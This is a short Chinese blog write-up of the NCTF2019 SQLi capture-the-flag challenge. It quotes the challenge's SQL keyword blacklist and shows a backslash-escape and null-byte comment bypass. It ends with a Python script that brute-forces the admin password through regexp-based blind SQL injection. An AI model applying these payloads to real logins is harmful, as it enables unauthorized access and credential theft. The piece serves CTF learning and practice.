[NCTF2019]SQLi

原创已于 2022-04-29 22:11:51 修改 · 307 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全

于 2022-04-29 22:07:06 首次发布

Buuctf刷题篇专栏收录该内容

41 篇文章

订阅专栏

robotx.txt 下放了个提示 hint.txt
在这里插入图片描述

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

过滤挺多的，然后需要最后提交的 passwd 正确就可以得到flag
username=\&passwd=||/**/1;%00
就变成这种形式，%00也可以当做注释截断掉后面内容
select * from users where username='\' and passwd='||/**/1;
在这里插入图片描述

import requests

url = 'http://b900e3e6-85e9-48e0-b95a-253bbbd9b761.node4.buuoj.cn:81/index.php'
strs = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}+-"
result = ""

while True:
    for i in strs:
        payload = "||(passwd/**/regexp/**/{});\x00".format('"^'+result+i+'"')
        data = {
            'username': '\\',
            'passwd': payload
        }
        res = requests.post(url=url,data=data).text
        if "welcome" in res:
            result += i
            print(result)
            break